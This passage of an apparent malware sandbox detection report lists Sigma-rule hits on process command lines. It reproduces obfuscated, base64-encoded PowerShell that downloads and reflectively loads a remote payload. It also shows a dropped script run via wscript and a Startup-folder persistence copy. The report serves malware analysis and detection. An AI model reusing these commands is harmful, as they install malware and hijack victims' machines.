{0'+'}htt'+'ps://raw.'+'gith'+'u'+'buser'+'cont'+'ent.co'+'m/N'+'oDetec'+'tO'+'n/NoDe'+'tectOn/'+'r'+'e'+'f'+'s/'+'he'+'ads/main/D'+'et'+'ahNote_J.txt'+'{0}'+'; '+'{'+'2}bas'+'e64Co'+'n'+'ten'+'t = (New-Object'+' S'+'yst'+'em'+'.Net'+'.W'+'e'+'b'+'Clie'+'n'+'t'+').'+'D'+'ownlo'+'a'+'dSt'+'r'+'i'+'ng'+'({'+'2}url); '+'{2}bi'+'na'+'ryCon'+'tent = [S'+'ystem.'+'Conver'+'t]:'+':Fr'+'o'+'mBase64String({2}ba'+'se64'+'C'+'ont'+'ent)'+';'+' {2}'+'asse'+'m'+'b'+'ly '+'= [Ref'+'le'+'c'+'ti'+'on.Assemb'+'ly]::L'+'oa'+'d'+'({'+'2}bina'+'ry'+'C'+'ontent); {2}'+'c'+'omma'+'n'+'d ='+' {0}['+'dnlib.'+'IO.Home]::'+'V'+'AI('+'{'+'3'+'}0/'+'K'+'SAc'+'F'+'/d'+'/ee.'+'et'+'s'+'a'+'p//:spt'+'th'+'{3}'+', {3}1'+'{3}'+', {3'+'}'+'C:'+'{'+'1'+'}Pro'+'gr'+'amD'+'a'+'t'+'a{1'+'}{'+'3}, {'+'3'+'}'+'ra'+'jado'+'{3'+'}, '+'{3}Ad'+'d'+'InP'+'rocess32{3},'+' {3'+'}'+'d'+'es'+'at'+'ivado{3},'+'{3}'+'{3})'+'{'+'0}'+';'+' I'+'nvok'+'e-Ex'+'p'+'ression {2'+'}com'+'m'+'an'+'d') -F [cHar]39,[cHar]92,[cHar]36,[cHar]34) )", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LgAoACAAJABlAE4AdgA6AGMATwBNAFMAUABFAGMAWwA0ACwAMQA1ACwAMgA1AF0ALQBKAG8ASQBOACcAJwApACgAIAAoACgAJwB7ADIAfQB1AHIAbAAgAD0AIAB7ADAAJwArACcAfQBoAHQAdAAnACsAJwBwAHMAOgAvAC8AcgBhAHcALgAnACsAJwBnAGkAdABoACcAKwAnAHUAJwArACcAYgB1AHMAZQByACcAKwAnAGMAbwBuAHQAJwArACcAZQBuAHQALgB
            Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $eNv:cOMSPEc[4,15,25]-JoIN'')( (('{2}url = {0'+'}htt'+'ps://raw.'+'gith'+'u'+'buser'+'cont'+'ent.co'+'m/N'+'oDetec'+'tO'+'n/NoDe'+'tectOn/'+'r'+'e'+'f'+'s/'+'he'+'ads/main/D'+'et'+'ahNote_J.txt'+'{0}'+'; '+'{'+'2}bas'+'e64Co'+'n'+'ten'+'t = (New-Object'+' S'+'yst'+'em'+'.Net'+'.W'+'e'+'b'+'Clie'+'n'+'t'+').'+'D'+'ownlo'+'a'+'dSt'+'r'+'i'+'ng'+'({'+'2}url); '+'{2}bi'+'na'+'ryCon'+'tent = [S'+'ystem.'+'Conver'+'t]:'+':Fr'+'o'+'mBase64String({2}ba'+'se64'+'C'+'ont'+'ent)'+';'+' {2}'+'asse'+'m'+'b'+'ly '+'= [Ref'+'le'+'c'+'ti'+'on.Assemb'+'ly]::L'+'oa'+'d'+'({'+'2}bina'+'ry'+'C'+'ontent); {2}'+'c'+'omma'+'n'+'d ='+' {0}['+'dnlib.'+'IO.Home]::'+'V'+'AI('+'{'+'3'+'}0/'+'K'+'SAc'+'F'+'/d'+'/ee.'+'et'+'s'+'a'+'p//:spt'+'th'+'{3}'+', {3}1'+'{3}'+', {3'+'}'+'C:'+'{'+'1'+'}Pro'+'gr'+'amD'+'a'+'t'+'a{1'+'}{'+'3}, {'+'3'+'}'+'ra'+'jado'+'{3'+'}, '+'{3}Ad'+'d'+'InP'+'rocess32{3},'+' {3'+'}'+'d'+'es'+'at'+'ivado{3},'+'{3}'+'{3})'+'{'+'0}'+';'+' I'+'nvok'+'e-Ex'+'p'+'ression {2'+'}com'+'m'+'an'+'d') -F [cHar]39,[cHar]92,[cHar]36,[cHar]34) )", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $eNv:cOMSPEc[4,15,25]-JoIN'')( (('{2}url = {0'+'}htt'+'ps://raw.'+'gith'+'u'+'buser'+'cont'+'ent.co'+'m/N'+'oDetec'+'tO'+'n/NoDe'+'tectOn/'+'r'+'e'+'f'+'s/'+'he'+'ads/main/D'+'et'+'ahNote_J.txt'+'{0}'+'; '+'{'+'2}bas'+'e64Co'+'n'+'ten'+'t = (New-Object'+' S'+'yst'+'em'+'.Net'+'.W'+'e'+'b'+'Clie'+'n'+'t'+').'+'D'+'ownlo'+'a'+'dSt'+'r'+'i'+'ng'+'({'+'2}url); '+'{2}bi'+'na'+'ryCon'+'tent = [S'+'ystem.'+'Conver'+'t]:'+':Fr'+'o'+'mBase64String({2}ba'+'se64'+'C'+'ont'+'ent)'+';'+' {2}'+'asse'+'m'+'b'+'ly '+'= [Ref'+'le'+'c'+'ti'+'on.Assemb'+'ly]::L'+'oa'+'d'+'({'+'2}bina'+'ry'+'C'+'ontent); {2}'+'c'+'omma'+'n'+'d ='+' {0}['+'dnlib.'+'IO.Home]::'+'V'+'AI('+'{'+'3'+'}0/'+'K'+'SAc'+'F'+'/d'+'/ee.'+'et'+'s'+'a'+'p//:spt'+'th'+'{3}'+', {3}1'+'{3}'+', {3'+'}'+'C:'+'{'+'1'+'}Pro'+'gr'+'amD'+'a'+'t'+'a{1'+'}{'+'3}, {'+'3'+'}'+'ra'+'jado'+'{3'+'}, '+'{3}Ad'+'d'+'InP'+'rocess32{3},'+' {3'+'}'+'d'+'es'+'at'+'ivado{3},'+'{3}'+'{3})'+'{'+'0}'+';'+' I'+'nvok'+'e-Ex'+'p'+'ression {2'+'}com'+'m'+'an'+'d') -F [cHar]39,[cHar]92,[cHar]36,[cHar]34) )", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LgAoACAAJABlAE4AdgA6AGMATwBNAFMAUABFAGMAWwA0ACwAMQA1ACwAMgA1AF0ALQBKAG8ASQBOACcAJwApACgAIAAoACgAJwB7ADIAfQB1AHIAbAAgAD0AIAB7ADAAJwArACcAfQBoAHQAdAAnACsAJwBwAHMAOgAvAC8AcgBhAHcALgAnACsAJwBnAGkAdABoACcAKwAnAHUAJwArACcAYgB1AHMAZQByACcAKwAnAGMAbwBuAHQAJwArACcAZQBuAHQALgB
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LgAoACAAJABlAE4AdgA6AGMATwBNAFMAUABFAGMAWwA0ACwAMQA1ACwAMgA1AF0ALQBKAG8ASQBOACcAJwApACgAIAAoACgAJwB7ADIAfQB1AHIAbAAgAD0AIAB7ADAAJwArACcAfQBoAHQAdAAnACsAJwBwAHMAOgAvAC8AcgBhAHcALgAnACsAJwBnAGkAdABoACcAKwAnAHUAJwArACcAYgB1AHMAZQByACcAKwAnAGMAbwBuAHQAJwArACcAZQBuAHQALgBjAG8AJwArACcAbQAvAE4AJwArACcAbwBEAGUAdABlAGMAJwArACcAdABPACcAKwAnAG4ALwBOAG8ARABlACcAKwAnAHQAZQBjAHQATwBuAC8AJwArACcAcgAnACsAJwBlACcAKwAnAGYAJwArACcAcwAvACcAKwAnAGgAZQAnACsAJwBhAGQAcwAvAG0AYQBpAG4ALwBEACcAKwAnAGUAdAAnACsAJwBhAGgATgBvAHQAZQBfAEoALgB0AHgAdAAnACsAJwB7ADAAfQAnACsAJwA7ACAAJwArACcAewAnACsAJwAyAH0AYgBhAHMAJwArACcAZQA2ADQAQwBvACcAKwAnAG4AJwArACcAdABlAG4AJwArACcAdAAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAJwArACcAIABTACcAKwAnAHkAcwB0ACcAKwAnAGUAbQAnACsAJwAuAE4AZQB0ACcAKwAnAC4AVwAnACsAJwBlACcAKwAnAGIAJwArACcAQwBsAGkAZQAnACsAJwBuACcAKwAnAHQAJwArACcAKQAuACcAKwAnAEQAJwArACcAbwB3AG4AbABvACcAKwAnAGEAJwArACcAZABTAHQAJwArACcAcgAnACsAJwBpACcAKwAnAG4AZwAnACsAJwAoAHsAJwArACcAMgB9AHUAcgBsACkAOwAgACcAKwAnAHsAMgB9AGIAaQAnACsAJwBuAGEAJwArACcAcgB5AEMAbwBuACcAKwAnAHQAZQBuAHQAIAA9ACAAWwBTACcAKwAnAHkAcwB0AGUAbQAuACcAKwAnAEMAbwBuAHYAZQByACcAKwAnAHQAXQA6ACcAKwAnADoARgByACcAKwAnAG8AJwArACcAbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAHsAMgB9AGIAYQAnACsAJwBzAGUANgA0ACcAKwAnAEMAJwArACcAbwBuAHQAJwArACcAZQBuAHQAKQAnACsAJwA7ACcAKwAnACAAewAyAH0AJwArACcAYQBzAHMAZQAnACsAJwBtACcAKwAnAGIAJwArACcAbAB5ACAAJwArACcAPQAgAFsAUgBlAGYAJwArACcAbABlACcAKwAnAGMAJwArACcAdABpACcAKwAnAG8AbgAuAEEAcwBzAGUAbQBiACcAKwAnAGwAeQBdADoAOgBMACcAKwAnAG8AYQAnACsAJwBkACcAKwAnACgAewAnACsAJwAyAH0AYgBpAG4AYQAnACsAJwByAHkAJwArACcAQwAnACsAJwBvAG4AdABlAG4AdAApADsAIAB7ADIAfQAnACsAJwBjACcAKwAnAG8AbQBtAGEAJwArACcAbgAnACsAJwBkACAAPQAnACsAJwAgAHsAMAB9AFsAJwArACcAZABuAGwAaQBiAC4AJwArACcASQBPAC4ASABvAG0AZQBdADoAOgAnACsAJwBWACcAKwAnAEEASQAoACcAKwAnAHsAJwArACcAMwAnACsAJwB9ADAALwAnACsAJwBLACcAKwAnAFMAQQBjACcAKwAnAEYAJwArACcALwBkACcAKwAnAC8AZQBlAC4AJwArACcAZQB0ACcAKwAnAHMAJwArACcAYQAnACsAJwBwAC8ALwA6AHMAcAB0ACcAKwAnAHQAaAAnACsAJwB7ADMAfQAnACsAJwAsACAAewAzAH0AMQAnACsAJwB7ADMAfQAnACsAJwAsACAAewAzACcAKwAnAH0AJwArACcAQwA6ACcAKwAnAHsAJwArACcAMQAnACsAJwB9AFAAcgBvACcAKwAnAGcAcgAnACsAJwBhAG0ARAAnACsAJwBhACcAKwAnAHQAJwArACcAYQB7ADEAJwArACcAfQB7ACcAKwAnADMAfQAsACAAewAnACsAJwAzACcAKwAnAH0AJwArACcAcgBhACcAKwAnAGoAYQBkAG8AJwArACcAewAzACcAKwAnAH0ALAAgACcAKwAnAHsAMwB9AEEAZAAnACsAJwBkACcAKwAnAEkAbgBQACcAKwAnAHIAbwBjAGUAcwBzADMAMgB7ADMAfQAsACcAKwAnACAAewAzACcAKwAnAH0AJwArACcAZAAnACsAJwBlAHMAJwArACcAYQB0ACcAKwAnAGkAdgBhAGQAbwB7ADMAfQAsACcAKwAnAHsAMwB9ACcAKwAnAHsAMwB9ACkAJwArACcAewAnACsAJwAwAH0AJwArACcAOwAnACsAJwAgAEkAJwArACcAbgB2AG8AawAnACsAJwBlAC0ARQB4ACcAKwAnAHAAJwArACcAcgBlAHMAcwBpAG8AbgAgAHsAMgAnACsAJwB9AGMAbwBtACcAKwAnAG0AJwArACcAYQBuACcAKwAnAGQAJwApACAALQBGACAAWwBjAEgAYQByAF0AMwA5ACwAWwBjAEgAYQByAF0AOQAyACwAWwBjAEgAYQByAF0AMwA2ACwAWwBjAEgAYQByAF0AMwA0ACkAIAApAA==';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -window
            Source: Process startedAuthor: pH-T (Nextron Systems), Harjot Singh, @cyb3rjy0t: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KAAoACcAQwBTAEUAJwArACcAdQByAGwAIAA9ACAAJwArACcASwBrACcAKwAnAHMAJwArACcAaAB0AHQAcABzADoALwAvAHIAYQB3AC4AZwBpAHQAaAAnACsAJwB1AGIAdQBzAGUAcgBjAG8AbgAnACsAJwB0AGUAbgB0AC4AYwBvACcAKwAnAG0ALwBOAG8AJwArACcARABlAHQAZQBjAHQATwBuAC8ATgBvAEQAZQB0AGUAYwAnACsAJwB0AE8AbgAvACcAKwAnAHIAZQBmAHMAJwArACcALwBoAGUAJwArACcAYQBkAHMALwBtAGEAaQAnACsAJwBuAC8ARABlAHQAJwArACcAYQBoAE4AbwB0ACcAKwAnAGUAXwBKAC4AdAB4AHQAJwArACcASwBrACcAKwAnAHMAOwAgAEMAUwAnACsAJwBFAGIAYQBzAGUANgA0ACcAKwAnAEMAbwBuAHQAJwArACcAZQAnACsAJwBuAHQAIAA9ACAAJwArACcAKABOACcAKwAnAGUAdwAtAE8AYgAnACsAJwBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAJwArACcAbABpACcAKwAnAGUAbgB0ACkALgBEACcAKwAnAG8AdwBuAGwAbwBhAGQAJwArACcAUwB0AHIAJwArACcAaQBuAGcAJwArACcAKABDAFMARQB1AHIAbAApACcAKwAnADsAIABDAFMARQBiAGkAbgBhAHIAeQBDAG8AJwArACcAbgB0AGUAbgB0ACAAPQAgACcAKwAnAFsAUwB5AHMAdABlAG0ALgBDAG8AJwArACcAbgB2AGUAcgB0AF0AOgA6ACcAKwAnAEYAcgBvAG0AQgBhACcAKwAnAHMAZQAnACsAJwA2ADQAJwArACcAUwAnACsAJwB0AHIAJwArACcAaQAnACsAJwBuAGcAKABDAFMARQBiAGEAcwBlADYANABDAG8AbgB0AGUAbgB0ACcAKwAnACkAOwAnACsAJwAgAEMAUwBFAGEAcwBzAGUAbQAnACsAJwBiAGwAeQAgAD0AJwArACcAIABbACcAKwAnAFIAZQAnACsAJwBmAGwAZQBjAHQAJwArACcAaQBvACcAKwAnAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoAEMAJwArACcAUwAnACsAJwBFAGIAaQBuACcAKwAnAGEAcgB5AEMAbwBuAHQAZQBuACcAKwAnAHQAKQA7ACAAQwBTAEUAYwAnACsAJwBvAG0AbQAnACsAJwBhAG4AZAAgAD0AIAAnACsAJwBLACcAKwAnAGsAJwArACcAcwBbACcAKwAnAGQAbgBsAGkAYgAuAEkATwAuAEgAJwArACcAbwBtACcAKwAnAGUAXQAnACsAJwA6ADoAVgBBAEkAKABvAE4ASQAwAC8AegBiAEUAdQBjACcAKwAnAC8AZAAvAGUAZQAuACcAKwAnAGUAJwArACcAdABzAGEAcAAvAC8AOgBzAHAAdAB0ACcAKwAnAGgAbwBOACcAKwAnAEkALAAgAG8ATgBJADEAbwBOACcAKwAnAEkALAAgAG8ATgBJAEMAOgAxACcAKwAnAGwAcABQAHIAbwBnACcAKwAnAHIAYQBtAEQAJwArACcAYQB0AGEAMQBsAHAAbwBOAEkALAAgAG8AJwArACcATgAnACsAJwBJAHQAbwBuAGQAaQBuAGgAbwBvAE4ASQAsACAAJwArACcAbwBOAEkAQQAnACsAJwBwAHAATABhAHUAJwArACcAbgBjAGgAbwBOACcAKwAnAEkALAAgAG8AJwArACcATgBJAGQAZQBzAGEAdABpAHYAYQAnACsAJwBkAG8AbwBOAEkAJwArACcALABvAE4ASQBvACcAKwAnAE4ASQApAEsAawBzADsAIABJAG4AdgBvAGsAZQAtAEUAJwArACcAeABwAHIAJwArACcAZQBzAHMAaQAnACsAJwBvACcAKwAnAG4AJwArACcAIABDACcAKwAnAFMARQBjAG8AbQBtAGEAbgBkACcAKQAgAC0AYwBSAEUAUABsAEEAQwBlACAAIAAoAFsAQwBIAEEAcgBdADYANwArAFsAQwBIAEEAcgBdADgAMwArAFsAQwBIAEEAcgBdADYAOQApACwAWwBDAEgAQQByAF0AMwA2ACAALQBjAFIARQBQAGwAQQBDAGUAIAAoAFsAQwBIAEEAcgBdADEAMQAxACsAWwBDAEgAQQByAF0ANwA4ACsAWwBDAEgAQQByAF0ANwAzACkALABbAEMASABBAHIAXQAzADQALQBjAFIARQBQAGwAQQBDAGUAIAAgACcASwBrAHMAJwAsAFsAQwBIAEEAcgBdADMAOQAgACAALQBSAGUAcABsAEEAYwBlACAAKABbAEMASABBAHIAXQA0ADkAKwBbAEMASABBAHIAXQAxADAAOAArAFsAQwBIAEEAcgBdADEAMQAyACkALABbAEMASABBAHIAXQA5ADIAKQAgAHwAaQBlAHgA';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KAAoACcAQwBTAEUAJwArACcAdQByAGwAIAA9ACAAJwArACcASwBrACcAKwAnAHMAJwArACcAa
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "wscript.exe" C:\Users\Public\Documents\2p_bee.js, CommandLine: "wscript.exe" C:\Users\Public\Documents\2p_bee.js, CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\copyright_infringement_evidence_1.exe", ParentImage: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe, ParentProcessId: 6572, ParentProcessName: copyright_infringement_evidence_1.exe, ProcessCommandLine: "wscript.exe" C:\Users\Public\Documents\2p_bee.js, ProcessId: 7404, ProcessName: wscript.exe
            Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "wscript.exe" C:\Users\Public\Documents\2p_bee.js, CommandLine: "wscript.exe" C:\Users\Public\Documents\2p_bee.js, CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\copyright_infringement_evidence_1.exe", ParentImage: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe, ParentProcessId: 6572, ParentProcessName: copyright_infringement_evidence_1.exe, ProcessCommandLine: "wscript.exe" C:\Users\Public\Documents\2p_bee.js, ProcessId: 7404, ProcessName: wscript.exe
            Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LgAoACAAJABlAE4AdgA6AGMATwBNAFMAUABFAGMAWwA0ACwAMQA1ACwAMgA1AF0ALQBKAG8ASQBOACcAJwApACgAIAAoACgAJwB7ADIAfQB1AHIAbAAgAD0AIAB7ADAAJwArACcAfQBoAHQAdAAnACsAJwBwAHMAOgAvAC8AcgBhAHcALgAnACsAJwBnAGkAdABoACcAKwAnAHUAJwArACcAYgB1AHMAZQByACcAKwAnAGMAbwBuAHQAJwArACcAZQBuAHQALgBjAG8AJwArACcAbQAvAE4AJwArACcAbwBEAGUAdABlAGMAJwArACcAdABPACcAKwAnAG4ALwBOAG8ARABlACcAKwAnAHQAZQBjAHQATwBuAC8AJwArACcAcgAnACsAJwBlACcAKwAnAGYAJwArACcAcwAvACcAKwAnAGgAZQAnACsAJwBhAGQAcwAvAG0AYQBpAG4ALwBEACcAKwAnAGUAdAAnACsAJwBhAGgATgBvAHQAZQBfAEoALgB0AHgAdAAnACsAJwB7ADAAfQAnACsAJwA7ACAAJwArACcAewAnACsAJwAyAH0AYgBhAHMAJwArACcAZQA2ADQAQwBvACcAKwAnAG4AJwArACcAdABlAG4AJwArACcAdAAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAJwArACcAIABTACcAKwAnAHkAcwB0ACcAKwAnAGUAbQAnACsAJwAuAE4AZQB0ACcAKwAnAC4AVwAnACsAJwBlACcAKwAnAGIAJwArACcAQwBsAGkAZQAnACsAJwBuACcAKwAnAHQAJwArACcAKQAuACcAKwAnAEQAJwArACcAbwB3AG4AbABvACcAKwAnAGEAJwArACcAZABTAHQAJwArACcAcgAnACsAJwBpACcAKwAnAG4AZwAnACsAJwAoAHsAJwArACcAMgB9AHUAcgBsACkAOwAgACcAKwAnAHsAMgB9AGIAaQAnACsAJwBuAGEAJwArACcAcgB5AEMAbwBuACcAKwAnAHQAZQBuAHQAIAA9ACAAWwBTACcAKwAnAHkAcwB0AGUAbQAuACcAKwAnAEMAbwBuAHYAZQByACcAKwAnAHQAXQA6ACcAKwAnADoARgByACcAKwAnAG8AJwArACcAbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAHsAMgB9AGIAYQAnACsAJwBzAGUANgA0ACcAKwAnAEMAJwArACcAbwBuAHQAJwArACcAZQBuAHQAKQAnACsAJwA7ACcAKwAnACAAewAyAH0AJwArACcAYQBzAHMAZQAnACsAJwBtACcAKwAnAGIAJwArACcAbAB5ACAAJwArACcAPQAgAFsAUgBlAGYAJwArACcAbABlACcAKwAnAGMAJwArACcAdABpACcAKwAnAG8AbgAuAEEAcwBzAGUAbQBiACcAKwAnAGwAeQBdADoAOgBMACcAKwAnAG8AYQAnACsAJwBkACcAKwAnACgAewAnACsAJwAyAH0AYgBpAG4AYQAnACsAJwByAHkAJwArACcAQwAnACsAJwBvAG4AdABlAG4AdAApADsAIAB7ADIAfQAnACsAJwBjACcAKwAnAG8AbQBtAGEAJwArACcAbgAnACsAJwBkACAAPQAnACsAJwAgAHsAMAB9AFsAJwArACcAZABuAGwAaQBiAC4AJwArACcASQBPAC4ASABvAG0AZQBdADoAOgAnACsAJwBWACcAKwAnAEEASQAoACcAKwAnAHsAJwArACcAMwAnACsAJwB9ADAALwAnACsAJwBLACcAKwAnAFMAQQBjACcAKwAnAEYAJwArACcALwBkACcAKwAnAC8AZQBlAC4AJwArACcAZQB0ACcAKwAnAHMAJwArACcAYQAnACsAJwBwAC8ALwA6AHMAcAB0ACcAKwAnAHQAaAAnACsAJwB7ADMAfQAnACsAJwAsACAAewAzAH0AMQAnACsAJwB7ADMAfQAnACsAJwAsACAAewAzACcAKwAnAH0AJwArACcAQwA6ACcAKwAnAHsAJwArACcAMQAnACsAJwB9AFAAcgBvACcAKwAnAGcAcgAnACsAJwBhAG0ARAAnACsAJwBhACcAKwAnAHQAJwArACcAYQB7ADEAJwArACcAfQB7ACcAKwAnADMAfQAsACAAewAnACsAJwAzACcAKwAnAH0AJwArACcAcgBhACcAKwAnAGoAYQBkAG8AJwArACcAewAzACcAKwAnAH0ALAAgACcAKwAnAHsAMwB9AEEAZAAnACsAJwBkACcAKwAnAEkAbgBQACcAKwAnAHIAbwBjAGUAcwBzADMAMgB7ADMAfQAsACcAKwAnACAAewAzACcAKwAnAH0AJwArACcAZAAnACsAJwBlAHMAJwArACcAYQB0ACcAKwAnAGkAdgBhAGQAbwB7ADMAfQAsACcAKwAnAHsAMwB9ACcAKwAnAHsAMwB9ACkAJwArACcAewAnACsAJwAwAH0AJwArACcAOwAnACsAJwAgAEkAJwArACcAbgB2AG8AawAnACsAJwBlAC0ARQB4ACcAKwAnAHAAJwArACcAcgBlAHMAcwBpAG8AbgAgAHsAMgAnACsAJwB9AGMAbwBtACcAKwAnAG0AJwArACcAYQBuACcAKwAnAGQAJwApACAALQBGACAAWwBjAEgAYQByAF0AMwA5ACwAWwBjAEgAYQByAF0AOQAyACwAWwBjAEgAYQByAF0AMwA2ACwAWwBjAEgAYQByAF0AMwA0ACkAIAApAA==';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -window
            Source: Process startedAuthor: Michael Haag: Data: Command: "wscript.exe" C:\Users\Public\Documents\2p_bee.js, CommandLine: "wscript.exe" C:\Users\Public\Documents\2p_bee.js, CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\copyright_infringement_evidence_1.exe", ParentImage: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe, ParentProcessId: 6572, ParentProcessName: copyright_infringement_evidence_1.exe, ProcessCommandLine: "wscript.exe" C:\Users\Public\Documents\2p_bee.js, ProcessId: 7404, ProcessName: wscript.exe
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\2x_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')'), CommandLine: powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\2x_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')'), CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\2x_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')'), ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7856, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\2x_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')'), ProcessId: 6000, ProcessName: powershell.exe
            Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $eNv:cOMSPEc[4,15,25]-JoIN'')( (('{2}url = {0'+'}htt'+'ps://raw.'+'gith'+'u'+'buser'+'cont'+'ent.co'+'m/N'+'oDetec'+'tO'+'n/NoDe'+'tectOn/'+'r'+'e'+'f'+'s/'+'he'+'ads/main/D'+'et'+'ahNote_J.txt'+'{0}'+'; '+'{'+'2}bas'+'e64Co'+'n'+'ten'+'t = (New-Object'+' S'+'yst'+'em'+'.Net'+'.W'+'e'+'b'+'Clie'+'n'+'t'+').'+'D'+'ownlo'+'a'+'dSt'+'r'+'i'+'ng'+'({'+'2}url); '+'{2}bi'+'na'+'ryCon'+'tent = [S'+'ystem.'+'Conver'+'t]:'+':Fr'+'o'+'mBase64String({2}ba'+'se64'+'C'+'ont'+'ent)'+';'+' {2}'+'asse'+'m'+'b'+'ly '+'= [Ref'+'le'+'c'+'ti'+'on.Assemb'+'ly]::L'+'oa'+'d'+'({'+'2}bina'+'ry'+'C'+'ontent); {2}'+'c'+'omma'+'n'+'d ='+' {0}['+'dnlib.'+'IO.Home]::'+'V'+'AI('+'{'+'3'+'}0/'+'K'+'SAc'+'F'+'/d'+'/ee.'+'et'+'s'+'a'+'p//:spt'+'th'+'{3}'+', {3}1'+'{3}'+', {3'+'}'+'C:'+'{'+'1'+'}Pro'+'gr'+'amD'+'a'+'t'+'a{1'+'}{'+'3}, {'+'3'+'}'+'ra'+'jado'+'{3'+'}, '+'{3}Ad'+'d'+'InP'+'rocess32{3},'+' {3'+'}'+'d'+'es'+'at'+'ivado{3},'+'{3}'+'{3})'+'{'+'0}'+';'+' I'+'nvok'+'e-Ex'+'p'+'ression {2'+'}com'+'m'+'an'+'d') -F [cHar]39,[cHar]92,[cHar]36,[cHar]34) )", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $eNv:cOMSPEc[4,15,25]-JoIN'')( (('{2}url = {0'+'}htt'+'ps://raw.'+'gith'+'u'+'buser'+'cont'+'ent.co'+'m/N'+'oDetec'+'tO'+'n/NoDe'+'tectOn/'+'r'+'e'+'f'+'s/'+'he'+'ads/main/D'+'et'+'ahNote_J.txt'+'{0}'+'; '+'{'+'2}bas'+'e64Co'+'n'+'ten'+'t = (New-Object'+' S'+'yst'+'em'+'.Net'+'.W'+'e'+'b'+'Clie'+'n'+'t'+').'+'D'+'ownlo'+'a'+'dSt'+'r'+'i'+'ng'+'({'+'2}url); '+'{2}bi'+'na'+'ryCon'+'tent = [S'+'ystem.'+'Conver'+'t]:'+':Fr'+'o'+'mBase64String({2}ba'+'se64'+'C'+'ont'+'ent)'+';'+' {2}'+'asse'+'m'+'b'+'ly '+'= 